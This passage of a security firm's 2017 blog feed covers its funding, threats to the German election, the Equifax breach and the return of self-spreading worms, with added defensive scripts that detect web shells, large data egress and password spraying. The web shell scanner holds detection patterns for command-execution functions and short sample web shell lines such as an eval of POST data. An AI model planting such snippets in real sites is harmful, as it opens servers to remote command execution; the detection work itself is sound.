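    & $add 'Execution policy AllSigned/RemoteSigned' ($ep -in 'AllSigned', 'RemoteSigned') "effective=$ep; $scopes"

    $results
}

Test-PowerShellHardening | Format-Table Control, Pass, Detail -AutoSize
```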


    To learn more, subscribe to our threat intelligence emails here.

    Recognition of Hard Work and Relevance – It’s Time to Go Global Wed, 20 Sep 2017 02:43:25 +0000 The news this morning that Digital Shadows has received $26 million in Series C funding from a number of new investors is testament to the hard work the whole team has put into making Digital Shadows successful and relevant for today’s digital economy.


     Figure 1: Now and then – a look back at an interview from our early days and our latest company video

    The fact that Octopus Ventures, World Innovation Lab, Industry Ventures and all of Digital Shadows’ existing investors are excited to invest in this business, which James Chappell and I started 6 years ago, shows that our drive to manage businesses’ digital risk is resonating with organizations of all sizes who continue to need support managing their online exposure, data loss and the increasingly targeted threats by professional cybercriminals and hacktivists. I am proud that Digital Shadows is able to operate as an extension of our clients’ internal teams, working on these challenges side by side as partners.

    The more we digitize business and government, the more we risk damage to our brand reputation, loss of intellectual property and exposure of sensitive data either through error, by well-meaning insiders and third parties, or malicious threat actors.

    In this digital world we live in, Digital Shadows’ ability to monitor, manage, and remediate digital risk across the widest range of data sources within the open, deep, and dark web is gaining widespread acceptance and week by week we see more of the world best brands signing up to our service.

    This latest investment, which brings our total funding to almost $50 million, will enable us to grow internationally, particularly in Asia Pacific, and continue our investment in our market-leading solution, SearchLight. All our new investors have impressive international pedigrees and complement our existing funders perfectly, and we look forward to welcoming Luke Hakes from Octopus Ventures to our Board.

    Over the past six years Digital Shadows has grown and expanded from our original base in the heart of London, to the global stage with more than 140 employees in offices in London, San Francisco and Dallas.

    Figure 2: Images from our San Francisco, Dallas, and London offices

    It’s a long way from the early days when James and I worked hard to bring our vision to life, and it is heartening to see our goal of enabling enterprises to protect and manage their digital assets and reduce their digital risk being embraced by investors, analysts and, of course, customers around the world. I want to personally thank every member of the Digital Shadows team and all of our clients for their efforts in making the company what it has become today. Here’s to the next six years and what they will bring!

    Bringing Down the Wahl: Three Threats to the German Federal Election Thu, 14 Sep 2017 02:28:14 +0000 Hacking has become the bogeyman of political election discourse. In Kenya, the recent presidential election result was forcibly annulled after the opposition alleged voting systems had been hacked. While these claims may be entirely valid, what’s worrying is that no concrete or convincing evidence to prove these allegations has been made public so far. Although not a new phenomenon, ever since the United States presidential election in 2016 the spectre of election interference by hostile nation states, hacktivists or political opponents has embedded itself in the public consciousness, and the fear of vote tampering grows by the day.

    The German federal election takes place on 24 September. Germans vote with pen and paper, and votes are counted by hand, but researchers have allegedly discovered vulnerabilities in the software used to register voting tallies, though it is still unclear whether these tactics can realistically be used to manipulate the election results themselves. Germany also has a long tradition of coalition governments. No party has won an outright majority since 1957, and two out of three of Merkel’s governments since 2005 have been Grand Coalitions with her main political opponent, the Social Democratic Party (SPD). With the German system geared to avoid partisanship, it is extremely difficult for an external power to influence the election and get a particular candidate into office.

    Digital Shadows’ analysis of election activity over the past 12 months suggests that we should look beyond the ballot box to the many other ways attackers can leave their mark on the democratic process. While attacks on physical voting systems are rare, attackers often look to capitalise on weaknesses in the broader political apparatus by targeting individual politicians, party networks or local branch offices. Voters may also be targeted by influence campaigns achieved through the spread of false information online. In the upcoming German election, therefore, we should look out for:

    1. Network intrusions and data leakage.

    As seen in both the United States and French presidential elections, attackers will look to release potentially sensitive files in order to discredit a political candidate. Two days before the French election vote in May 2017, an anonymous user posted emails, documents and photos intended to embarrass Emmanuel Macron to the 4Chan message board. The “Macron Leaks” ended up being relatively ineffectual, though this and previous leaks by Guccifer 2.0 in the United States election highlight how data leaks are believed to be an effective tactic for influencing the political process.

    Documents used in data leaks are often obtained through an initial network compromise. In the case of Guccifer 2.0, the leaked files were allegedly attained through a breach of the Democratic National Congress’ servers. German officials fear that sensitive emails stolen from senior lawmakers and politicians by apparent Russian hackers in 2015 could be released to harm Angela Merkel’s campaign. The offices of at least 16 parliamentarians were reportedly compromised in 2015, and in Mar 2017 think tanks aligned to Merkel’s Christian Democratic Union (CDU) were also purportedly targeted by APT-28, an espionage group widely believed to be associated with the Russian intelligence services.

    While allegations of Russian interference are unconfirmed, the fear is that Russia has considerable interest at stake in the outcome of the German election and will conduct network compromises as a means of collecting valuable strategic information. Points of interest include the fraught relationship between Russia, NATO and the EU, as well as the future of the Russo-German economic and commercial relationship – particularly with regards to energy provision – in the wake of the United States Congress’ recent decision to pass increasing international sanctions against Russia due to alleged election interference.

    2. Disinformation campaigns.

    Also known as “fake news”, false information intended to mislead audiences can be distributed via a wide variety of different media, including spoof social media accounts and even established online publications. The concern is such that in April 2017 the German cabinet voted on measures that penalize networks that fail to remove defamatory false information, hate speech and other illegal content with a €50m fine.

    German commentators believe most of the disinformation targeting German citizens has focused on immigration policy, which aims to spread xenophobia and undermine Merkel’s previous welcoming of refugees. The German fact-checking website Hoaxmap, for example, was established to identify and refute untrue online claims about refugees:


    Map taken from Hoaxmap website showing reported instances of false media stories on refugees [Source: Hoaxmap[.]org]

    3. Attacks on local political organizations.

    Attacks against local party branches and regional German parliaments have been reported. The CDU claimed its headquarters in the state of Rhineland-Palatinate experienced “massive attacks” ahead of the presidential debate on 03 September. The parliament network in the state of Saxony-Anhalt was reportedly targeted by a ransomware infection in late August, while the website for the North Rhine-Westphalia state was the victim of a denial of service (DoS) attack by an extortion actor in July. Although the ransomware and DoS were both probably financially motivated and unrelated to the election, attackers may continue to target local party branches believing that their sites and networks are more susceptible to attack.

    Despite the rhetoric warning of Russian election interference, the supposition that Russia would automatically favor Merkel’s opponent is not as clear cut as it might have been in other recent elections. As mentioned above, Germany and Russia currently share a very strong trading relationship, despite political and diplomatic tensions between the two nations. Also, Merkel’s main opponent, Martin Schulz of the Social Democratic Party (SPD), will not necessarily be more amenable to Russian interests than the incumbent. Firstly, Schulz is a staunch European and was President of the European Parliament from 2012 to 2017. Moreover, Schulz has repeatedly publicly rebuked Russia for its foreign policy: in February, Schulz warned against lifting Russian sanctions over its role in the Ukraine crisis, while in October 2016 he criticized the major role Russia had played in the Syrian civil war.

    While the likely motivations and ambitions of hostile nation states remain unclear, organizations can help protect themselves against many of the techniques described above. Mitigation measures include:

    • Providing adequate phishing training for all staff to lessen the risk of network intrusions and public data leakage
    • Properly securing public facing applications
    • Enforcing strong password security practices to reduce the likelihood of account takeovers, particularly on official social media accounts that can be used to spread disinformation
    • Monitoring for fake or spoofed social media profiles, and typosquats designed to impersonate legitimate websites
    • Remaining sceptical about reported statistics and stories, and attempting to verify them across multiple channels

    Influence campaigns, party network intrusions, and fears of vote hacking are now as central to the election process as traditional campaigning and party broadcasts. It is difficult to measure the impact of these types of attacks, but the mere possibility of election interference has served to further damage confidence in politics, particularly in the Western world. It would be naïve to assume that these fears would dissipate any time soon, especially as fears of election interference have a much longer history than the events of the past 12 months. Nevertheless, it is important that we learn to manage these ever-evolving risks and help maintain the elements of our political and electoral systems that we most cherish, while continuing to iron out their many imperfections.

    An Update on the Equifax Data Breach Wed, 13 Sep 2017 02:17:27 +0000

    The credit reporting agency Equifax reported on September 7th, that it had been breached. On Friday, we outlined what we knew at the time, which was replete with intelligence gaps. Five days have gone by and some of these gaps have now been filled in. Here’s what we know so far, and what we can learn from the Equifax breach.


    Figure 1 – Timeline of events surrounding Equifax breach


    Threat Actor Claims

    There have been at least two claims made by financially-motivated threat actors. One actor had made an extortion attempt and claimed to possess the data, the other offered web shell access to an Equifax server. The credibility of either of the claims was unknown and based on the available evidence the likelihood they were genuine could not be judged.

    1. Extortion attempt

    A Tor hidden service was established around September 8th on which claims were made the owners had compromised the Equifax data and were trying to monetize it. They valued the data at 600 Bitcoin (USD 2.7 million), alleging Equifax executives had amassed USD 3 million in shares by conducting insider trading prior to alerting the public to the breach incident. The operators of the hidden service set a deadline of September 15th for this ransom demand, claiming they would delete the data they possessed if it was paid. If no ransom was paid, the actors said the data would be released publicly. At the time of writing these claims were not confirmed, the site was no longer reachable and the email address had been disabled.


    Figure 2 – Statement on Tor hidden service

    On September 11th, an actor using the same nickname, “pasthole”, claimed on Pastebin that a portion of the data had been sold to an unidentified buyer. The actor also said they were responsible for the Tor hidden service previously used to announce an extortion attempt against Equifax. An email address and PGP key provided in the post provided no direct links between the now-offline Tor hidden service and the Pastebin post. None of the claims in this post could be substantiated at the time of writing.

    2. Web shell access offered for sale

    On September 8th, an actor known as “1×0123” claimed to have gained web shell access to an Equifax server, and subsequently offered this access for sale. In their initial post to their Twitter account, 1×0123 posted a screenshot of what appeared to be a listing of Equifax subdomains allegedly being accessed via the Equifax website. In a follow up post, 1×0123 then claimed to offer access to the web shell in exchange for 1 Bitcoin (BTC) and supplied a Jabber ID for contact. Based on 1×0123’s screenshot, it appeared as though they used the WSO web shell, which is a popular tool among certain hacking communities. We did not detect any evidence of authenticity for the alleged web shell access. The screenshot below shows the post made by the actor, who redacted the screenshot.

    Figure 3 – Claim made by 1×0123 
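
Whether or not 1×0123’s claim was genuine, a claimed web shell on your own web tier is worth a hunt. The following is an added example written for this page, not code from the original post or from Digital Shadows: a heuristic scanner for PHP web shells such as WSO. The indicator strings, weights and sample PHP snippets are the editor’s own, chosen to illustrate the technique rather than taken from any real incident; expect false positives on legitimate code that uses eval() or base64_decode(), and treat hits as leads for manual review rather than verdicts.

```python
"""Heuristic scan for PHP web shells such as WSO in a web root.

Added example, not from the original post. The indicators below are
illustrative heuristics chosen by the editor, not a vendor signature set.
"""
import os
import re
from typing import Dict, List

# (name, regex) pairs. Hypothetical, editor-chosen heuristics; tune per environment.
INDICATORS = [
    ("wso_marker", re.compile(r"WSO_VERSION|FilesMan|\$default_action", re.I)),
    ("eval_of_decoded_blob",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(", re.I)),
    ("dynamic_function_call", re.compile(r"\$\w+\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("os_command_from_request",
     re.compile(r"(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("long_base64_literal", re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]

WEIGHTS = {"wso_marker": 5, "os_command_from_request": 4, "eval_of_decoded_blob": 3,
           "dynamic_function_call": 2, "long_base64_literal": 1}


def scan_source(text: str) -> List[str]:
    """Return the names of the indicators that match one PHP source file, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def score(hits: List[str]) -> int:
    """Crude priority score: known shell markers and command execution from request data weigh most."""
    return sum(WEIGHTS[h] for h in hits)


def scan_tree(root: str, exts=(".php", ".phtml", ".php5", ".inc")) -> Dict[str, List[str]]:
    """Walk a web root and return {path: [indicators]} for every file with at least one hit."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if hits:
                findings[path] = hits
    return findings


# Constructed samples for a stand-alone run; not real files from any incident.
SAMPLE_SHELL = "<?php $auth_pass = ''; $default_action = 'FilesMan'; define('WSO_VERSION', '2.5'); eval(base64_decode($_POST['c']));"
SAMPLE_DROPPER = "<?php $f = 'sys'.'tem'; $f($_GET['cmd']);"   # string-concat evasion of the system( pattern
SAMPLE_CLEAN = "<?php echo htmlspecialchars($_GET['name'] ?? 'world');"

if __name__ == "__main__":
    for label, src in (("shell", SAMPLE_SHELL), ("dropper", SAMPLE_DROPPER), ("clean", SAMPLE_CLEAN)):
        hits = scan_source(src)
        print(f"{label:8s} score={score(hits)} hits={hits}")
```

Run it as-is to see the constructed samples scored, or call scan_tree("/var/www") on a real web root; the dropper sample shows why a single pattern is never enough, since a trivial concatenation hides the call name and only the dynamic-call-from-request heuristic still fires. Correlate any hit with the file’s modification time and the access log entries for the same path before acting on it.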

    Apache Struts Touted As The Web Application Vulnerability

In its breach disclosure, Equifax stated only that a web application vulnerability had been exploited, resulting in the data breach. Media reports subsequently alleged that the vulnerability was in Apache Struts, following publication of an equity research report by Robert W. Baird & Co. that claimed an Equifax representative had told the firm Apache Struts was exploited to access the compromised information. None of this could be confirmed at the time of writing.

    Criticisms Leveled Towards Equifax’s Response

    1. Executives sold shares prior to disclosure

    Three Equifax Inc. senior executives were reported to have sold shares collectively worth almost USD 1.8 million shortly after the company discovered the security breach on July 29th. The timing of these sales has led some to question whether the individuals had dumped the shares as a result of the breach. Equifax, however, said the executives had not been informed of the breach incident prior to them selling the shares.

    2. Equifax data breach checker

Equifax released a service designed to let individuals check whether they were affected by the breach, but multiple reports followed that it returned incorrect results. A test by the media outlet ZDNet using fake names and Social Security numbers returned the result “may have been impacted”. Equifax acknowledged that some consumers who visited the website shortly after launch may not have received confirmation that they were impacted. Whether the checker functioned correctly at the time of writing was not known.

    3. Legal updates

Following complaints from consumer advocates about Equifax’s terms of service, the company announced that using its TrustedID monitoring service would not cause a user to forfeit their right to join a class action lawsuit against the company over the breach.

    On September 8th, The Register also reported two class action lawsuits had been filed against the company, in Portland, Oregon and North Georgia US District Courts. The lawsuits saw Equifax accused of negligence and violations of the U.S. Fair Credit Reporting Act. The complaint filed in Oregon reportedly sought USD 70 billion in damages for residents of that state alone.


1. At the time of writing, it was not known exactly how many individuals were impacted by this data breach.
2. Despite the claims made by two threat actors, the individual(s) responsible for the breach and their motivations were unknown.
3. Although Equifax stated a web application vulnerability was exploited, the exact vulnerability is not known.


The breach has had a demonstrably negative impact on Equifax, both reputationally and financially. As of September 13th, Equifax stock (EFX) was down $31.16 per share since the announcement of the breach. Data breaches routinely increase the scrutiny of a company’s security posture, but the reporting on executives selling shares, the lawsuits and the way Equifax handled its response have all likely degraded its brand reputation.

The impact of this breach on individuals depends largely on the motivation of the actors who gained access to the data. For financially motivated actors, the exposed information would almost certainly be of high value for fraud: payment card details can be used to make fraudulent purchases, while personally identifiable information (PII) can be used for identity theft. Such data is also frequently offered for sale or traded on criminal marketplaces and forums, another potential means of profit. The New York Post published an article on September 8th saying that payment card fraud had “unexpectedly” spiked in August 2017. The article cited Liron Damri, co-founder of the fraud prevention service Forter, who assessed that the spike was likely tied to the Equifax breach and reportedly claimed a 15 percent increase in fraud attempts was detected in August 2017. At the time of writing, there was insufficient evidence to confirm a link between the Equifax breach and the increased fraud levels.

While debate continues as to whether the breach was caused by a “zero day” exploit targeting a previously unknown vulnerability or by a lapse in patching, the exact nature of the exploit is largely a side-show. The attack lifecycle describes a series of stages that an attacker needs to traverse in order to achieve their goals:

    1. Initial Reconnaissance
    2. Initial Compromise
    3. Establish Foothold
    4. Escalate Privileges
    5. Internal Recon
    6. Move Laterally
    7. Maintain presence
    8. Complete Mission

Successful exploitation of a vulnerable web application such as Apache Struts accounts for only the early steps of this chain: the initial compromise and the foothold (for example, a web shell) established through it. Six further steps separate the attacker from the data.

    In order to effectively defend against attackers, an organization must have prevention and detection mechanisms operating at all stages of the attack lifecycle. It cannot be assumed that patching a particular web application framework against security vulnerabilities is sufficient.

Assuming that attackers are able to penetrate the perimeter is the “assume breach” model, and it is an essential part of a mature organization’s approach. In brief, a defender should assume that attackers have already breached the outer defenses and are moving within the internal network; this corresponds to steps four through eight of the attack lifecycle. A defender can respond effectively by applying the principle of least privilege to reduce privilege escalation vectors, limiting the opportunities for an attacker to move laterally, detecting abnormal behavior, hunting for newly introduced persistence mechanisms, and monitoring the network for suspiciously large transfers to unknown systems outside the organization.
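
As an added example of the last of these controls (not code from the original post), here is a small detector for the “large transfers to unknown systems outside the organization” case, run over a constructed, NetFlow-like CSV. The internal ranges, the allowlist of sanctioned external endpoints, the window and the byte threshold are hypothetical tuning values, not anything the post prescribes.

```python
"""Flag large outbound transfers from internal hosts to unknown external hosts.

Added example (not from the original post). Input is a constructed CSV of
flow records: ts,src_ip,dst_ip,dst_port,bytes. Tuning values are hypothetical.
"""
import csv
import io
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Iterator, List, Tuple

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
KNOWN_EXTERNAL = {"203.0.113.10"}          # hypothetical: a sanctioned backup/SaaS endpoint
WINDOW = timedelta(minutes=10)
THRESHOLD_BYTES = 500 * 1024 * 1024        # 500 MiB per src->dst pair inside WINDOW


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flows(text: str) -> Iterator[Tuple[datetime, str, str, int, int]]:
    for row in csv.DictReader(io.StringIO(text)):
        yield (datetime.fromisoformat(row["ts"]), row["src_ip"], row["dst_ip"],
               int(row["dst_port"]), int(row["bytes"]))


def find_large_egress(text: str) -> List[Tuple[str, str, int]]:
    """Return [(src, dst, bytes_in_window)] for internal->unknown-external pairs whose
    summed bytes exceed THRESHOLD_BYTES within some WINDOW-long sliding window."""
    per_pair = defaultdict(list)
    for ts, src, dst, _port, nbytes in parse_flows(text):
        # Only internal sources talking to external hosts we have not sanctioned.
        if not is_internal(src) or is_internal(dst) or dst in KNOWN_EXTERNAL:
            continue
        per_pair[(src, dst)].append((ts, nbytes))
    alerts = []
    for (src, dst), flows in per_pair.items():
        flows.sort()
        total, start = 0, 0
        for ts, nbytes in flows:
            total += nbytes
            while ts - flows[start][0] > WINDOW:   # slide the window forward
                total -= flows[start][1]
                start += 1
            if total >= THRESHOLD_BYTES:
                alerts.append((src, dst, total))
                break   # one alert per pair is enough to start a hunt
    return alerts


# Constructed sample: a workstation pushing 900 MiB to an unknown host in six minutes,
# a server backing up to the sanctioned endpoint, ordinary browsing, and an internal copy.
SAMPLE_FLOWS = """ts,src_ip,dst_ip,dst_port,bytes
2017-09-01T02:00:00,10.1.5.23,198.51.100.77,443,314572800
2017-09-01T02:03:00,10.1.5.23,198.51.100.77,443,314572800
2017-09-01T02:06:00,10.1.5.23,198.51.100.77,443,314572800
2017-09-01T02:00:00,10.1.9.4,203.0.113.10,443,2147483648
2017-09-01T02:01:00,10.1.5.23,198.51.100.8,443,20480
2017-09-01T02:02:00,10.1.5.23,10.1.0.2,445,104857600
"""

if __name__ == "__main__":
    for src, dst, total in find_large_egress(SAMPLE_FLOWS):
        print(f"ALERT {src} -> {dst}: {total / 2**20:.0f} MiB inside {WINDOW}")
```

The point of the allowlist is that “large” alone is useless on a network that does backups; the signal is large plus unknown destination. In production, feed it from your flow collector and reduce the threshold once you know the normal per-host egress baseline.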

    Combining these techniques is called “defense in depth” and allows an organization to be robust against attackers wielding zero day exploits.

Equifax Breach: The Impact For Enterprises and Consumers Fri, 08 Sep 2017 08:36:49 +0000

What we know about the Equifax breach

On September 7th, credit reporting agency Equifax announced “a cybersecurity incident potentially impacting approximately 143 million U.S. consumers.” To put this in context, the incident is almost seven times larger than the Office of Personnel Management breach of 2015. Equifax discovered the unauthorized access on July 29th and determined that the intrusion began in mid-May. Equifax stated that “the information accessed primarily includes names, Social Security Numbers (SSNs), birth dates, addresses and, in some instances, driver’s license numbers. In addition, credit card numbers for approximately 209,000 U.S. consumers, and certain dispute documents with personal identifying information for approximately 182,000 U.S. consumers, were accessed.” Equifax also said that “limited personal information” for certain Canadian and United Kingdom residents was accessed. The initial attack vector was reported as a “web application vulnerability.”

    Figure 1. Chairman and Chief Executive Officer, Richard F. Smith discusses the Equifax Breach

    What we don’t know about the Equifax breach

    Whenever doing any sort of analysis, it is important to state what we don’t know. Simply put there is a great deal we don’t know and most of the public will never know (despite what some talking heads might claim). As a former incident responder, I know that investigations aren’t completed in the time it takes to complete an episode of TV drama Scorpion. (Did you know that Scorpion is starting its fourth season?) Equifax stated that the investigation is “substantially complete,” but wisely added that “it remains ongoing and is expected to be completed in the coming weeks.”

    • We don’t actually know how many SSNs were compromised.
    • We don’t know if all 143 million individual’s SSNs were impacted.
    • We don’t know the threat actor responsible for this intrusion. Equifax claimed that “criminals exploited” a web application, but attribution is always a challenge. Structured Analytic Techniques, like the Analysis of Competing Hypothesis we did for WannaCry, can be useful for considering attribution.
    • Speaking of web applications, although we don’t know the specific vulnerability that was exploited, I’d bet 1,000 Gold Dragons it was SQL injection.

    What is most likely to happen next

    There are a wide range of possibilities depending on the goals of the threat actor responsible for the Equifax intrusion. By the way, did I mention that attribution is challenging? Attribution aside, one thing is certain though, regardless of the motivations of the attackers, this data is perfect for social engineering attacks.

    Tax Return Fraud

    SSNs are highly valuable for criminals looking to commit tax refund fraud. Fraudsters use SSNs to file a tax return claiming a fraudulent refund and it can be hard to find out if you’re a victim until it is too late. There is some good advice from the IRS about what to do should you suffer from this form of fraud. You can read more about tax fraud in a blog we wrote earlier this year.

    Opening fraudulent accounts

There is no shortage of alternative finance companies, such as providers of short-term loans. Fraudsters can successfully open accounts in another individual’s name using a combination of SSNs, forged utility statements and other personally identifiable information (PII). Individuals should be extra vigilant for any evidence of accounts being opened in their name.


Payment card fraud

PII is valuable to payment card fraudsters, who need it to bypass security controls such as “Verified by Visa”, which sometimes asks for digits of the cardholder’s SSN. There are plenty of high-quality cards in criminal hands that do not require extra validation, but lower-level carders must turn to SSNs to enrich lower-quality card dumps. It’s important to remember that SSNs and payment card fraud are inextricably linked.

    Figure 2: An example of a security control for online credit card payments

    Benefits Fraud and Medical care fraud

    Although less glamorous than tax return fraud and carding, benefit and medical care fraud is a real risk. As with tax return fraud, this is hard to detect when it happens, but individuals can be vigilant when checking their Explanation of Benefits statement and flag any unfamiliar activity to their insurance provider.

    Resale of data

It’s important to note that the individuals responsible for the breach are unlikely to be the same criminals conducting the day-to-day fraud. In the case of the Experian breach, the stolen data soon made its way onto the (now defunct) Hansa marketplace. As I’ve previously mentioned, there’s already a market for SSNs to enrich credit card information, so it’s likely that many actors could end up getting a piece of the pie.

For lower-level criminals, the cost of doing business will fall even further. SSNs are already cheap: on one AVC (Automated Vending Cart) site (shown in Figure 3), there are over 3.4 million SSNs for sale at only $1 each. This includes full names, addresses and, for a large number of records, dates of birth. In California alone, there were 334,000 SSNs for sale.

    With tens (and potentially hundreds) of millions more SSNs potentially entering the market, the opportunities for criminals to commit fraud will increase and the price will decrease even more.

    Figure 3: A screenshot of an AVC selling Social Security Numbers

So far I’ve focused heavily on SSNs, but credit card information was also accessed in the breach. While the number runs to hundreds of thousands (209,000), it is unlikely to have a significant impact on an already burgeoning black market for credit card information.

    Enablement of nation state campaigns

    Although Equifax claimed this intrusion was conducted by a criminal threat actor, it is possible that this was a nation state actor. (Quick reminder to re-read my note from above “attribution is always a challenge.”) In the event that a nation state actor is responsible for the intrusion, then like the OPM breach, we won’t see the data being monetized in the criminal underground. The stolen data will be leveraged to enable nation states’ campaigns against their intelligence targets.

    Enablement of hacktivist campaigns

If we are going to consider nation state actors, we should also consider hacktivist threat actors and what they would do with the stolen data. If hacktivists were responsible (I think this is a pretty unlikely scenario, let’s call it #OPunlikely) you could expect them to use the data to target organizations and individuals that run counter to their world views. Embarrassment and doxing, hacktivist go-tos, would come into play.

    What enterprises can learn from the Equifax breach

1. Incident response takes time, and eradication in particular takes time. Equifax said the intrusion was discovered on July 29th and that it “acted immediately to stop the intrusion.” Containing the adversary that first day was the goal; true eradication took much longer. Set expectations with your leadership about how long eradication can actually take.
2. 3rd party risks raise their ugly head once again. Some aspects of this intrusion remind me of the September 2015 T-Mobile breach, in which Experian was hosting T-Mobile data that an unauthorized party accessed, resulting in the loss of 15 million individuals’ records. Any organization with a business-to-business relationship with Equifax needs to find out the scope of any potential loss of its employee or customer data. This 3rd party exposure also highlights the need for 3rd party risk monitoring.
3. Crisis communication is key. Effectively communicating during an intrusion is important; it won’t absolve you of your sins, but doing it wrong could make the situation far worse. Understanding when and what to communicate is also important. Equifax discovered the intrusion on July 29th and notified on September 7th. Some might ask why the notification took so long, but I don’t think that a month is that long. The investigation needs to be far enough along that you can confidently communicate the situation. A CEO who comes out two days after a breach and minimizes what turns out to be a much more significant incident will be performing a mea culpa in little time.
4. GDPR will change the breach notification game. Now let me really trip you up: how would this situation play out if it happened after May 25, 2018 and Equifax had lost European Union citizens’ data? The General Data Protection Regulation changes everything with its 72-hour breach notification window: “This must be done within 72 hours of first having become aware of the breach.” Once the fines come into force, the timing of the communication will have a significant impact.

    What consumers can learn from the Equifax breach

1. Consider taking advantage of Equifax’s offer. Although the irony is not lost on me, taking advantage of credit file monitoring and identity theft protection offers is important. Check out equifaxsecurity2017[.]com for more. If you don’t want to use Equifax for these services, I get it; look at alternatives from TransUnion or Experian.
2. Be vigilant about your payment card activity. Use email/SMS alerts that fire for transactions over a set amount (say $100) and under a set amount (say $5), since fraudsters often test a stolen card with a tiny charge first. If an unauthorized transaction occurs you are notified immediately and can act quickly. Report any suspicious activity to your bank.
3. Address tax fraud with IRS Form 14039. If you find out you are a victim of tax return fraud, there are still things you can do: victims can file IRS Form 14039 (Identity Theft Affidavit). Further details are available here.
4. Check your Explanation of Benefits (EOB) statement. It might look like another piece of junk mail, but it is important to reconcile the EOB statements your insurer sends you. This is your best bet for monitoring medical care fraud. Report any unfamiliar activity as soon as you observe it.
5. Assume breach. In the corporate cyber security world, we have learned to “assume breach”. Consumers should likewise operate on the assumption that their confidential data has already been compromised.

    Digital Shadows will continue to monitor this situation and provide updates as needed.

Return of the Worm: A Red Hat Analysis Thu, 07 Sep 2017 01:17:46 +0000

A computer worm is a piece of malware that is designed to replicate itself in order to spread to other machines. While worms have existed since at least the 1980s, they’ve made a surprise comeback in 2017. Notable pieces of malware, including ransomware and banking trojans, have sought to incorporate “wormable” functionalities. Following the WCry attacks, Rick Holland wrote a blog titled “The Early 2000s Called, They Want Their Worms Back”. Could 2017 be seen as the return of the worm? By using the Red Hat structured analytic technique, it’s possible to take the perspective of an attacker and understand the potential evolution of this technique in the near future.

    Worms in 2017

In early 2017, the SamSam ransomware added self-propagation techniques; its developers likely determined that the added capability would increase potential profits for the ransomware’s operators. More recently, Emotet and TrickBot, two banking trojans, added self-propagation to their functionality. Banking trojans target customers of online banking services in order to harvest their credentials and access accounts for subsequent fraudulent transfers. Both Emotet and TrickBot demonstrated a new capability that attempted self-propagation through a network, using two distinct techniques.

    1. Emotet relied on the brute-force cracking of credentials to spread internally among networked systems, using a list of passwords hard-coded into the malware. This was incorporated in the months after WCry and Petya, demonstrating how criminals track cyber trends and adjust their TTPs accordingly.
    2. The new TrickBot variant attempted to autonomously propagate among networked machines over the Server Message Block (SMB) service. There have been further indications that the exploit used in the TrickBot variant was ETERNALBLUE, an exploit for an SMB vulnerability (CVE-2017-0144). ETERNALBLUE was released by the Shadow Brokers in April 2017 and subsequently used in the WCry (WannaCry) attacks of May 2017.

    Over the past six months, there have been multiple instances of malware using network self-propagation techniques. As seen in Figure 1 below, the Backdoor.Nitol and Gh0st RAT trojans, WCry, and now, possibly, TrickBot have used ETERNALBLUE.

    Figure 1 – Timeline of malware adding self-propagation
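
The Emotet technique above is noisy from a defender’s point of view: every guessed password produces a failed logon on the target host. Below is an added example (not from the original post) of detection logic for that pattern, run over constructed, simplified Windows Security log lines where event 4625 denotes a failed logon. Real events arrive as EVTX/XML with fields such as IpAddress, TargetUserName and LogonType; the line format, thresholds and sample data here are the editor’s own.

```python
"""Detect internal password brute-forcing of the kind Emotet's spreader performs.

Added example, not code from the original post. Input is constructed, simplified
Windows Security log lines "ts host event source_ip account", where event 4625 is
a failed logon and 4624 a successful one.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, Iterator, Tuple

WINDOW = timedelta(minutes=5)   # hypothetical tuning values
MIN_FAILURES = 20
MIN_DISTINCT = 5                # distinct target hosts OR distinct accounts


def parse_failures(lines: Iterable[str]) -> Iterator[Tuple[datetime, str, str, str]]:
    """Yield (timestamp, target_host, source_ip, account) for 4625 events only."""
    for line in lines:
        ts, host, event, src, account = line.split()
        if event == "4625":
            yield datetime.fromisoformat(ts), host, src, account


def detect_spray(lines: Iterable[str]) -> Dict[str, Tuple[int, int, int]]:
    """Return {source_ip: (failures, distinct_accounts, distinct_hosts)} for each source
    that, inside some WINDOW-long sliding window, reaches MIN_FAILURES failed logons and
    touches at least MIN_DISTINCT accounts or hosts. One password list tried against many
    hosts (the Emotet pattern) trips the host criterion. A single account hammered on a
    single host trips neither distinct-count criterion, so pair this with a plain
    per-source failure-count rule in practice."""
    by_src = defaultdict(list)
    for ts, host, src, account in parse_failures(lines):
        by_src[src].append((ts, host, account))
    flagged: Dict[str, Tuple[int, int, int]] = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > WINDOW:
                start += 1                      # slide the window forward
            window = events[start:end + 1]
            accounts = {a for _, _, a in window}
            hosts = {h for _, h, _ in window}
            if len(window) >= MIN_FAILURES and max(len(accounts), len(hosts)) >= MIN_DISTINCT:
                flagged[src] = (len(window), len(accounts), len(hosts))
                break   # first qualifying window is enough; stop scanning this source
    return flagged


# Constructed sample: 10.0.0.50 tries "Administrator" against five hosts, 25 failures in
# under a minute; 10.0.0.7 is a user mistyping a password twice, then logging in.
SAMPLE_LOG = [
    f"2017-09-01T09:00:{i * 2:02d} host{i % 5} 4625 10.0.0.50 Administrator" for i in range(25)
] + [
    "2017-09-01T09:10:00 host1 4625 10.0.0.7 jsmith",
    "2017-09-01T09:10:30 host1 4625 10.0.0.7 jsmith",
    "2017-09-01T09:11:00 host1 4624 10.0.0.7 jsmith",
]

if __name__ == "__main__":
    for src, (n, n_acct, n_host) in detect_spray(SAMPLE_LOG).items():
        print(f"ALERT {src}: {n} failed logons against {n_host} host(s), {n_acct} account(s) within {WINDOW}")
```

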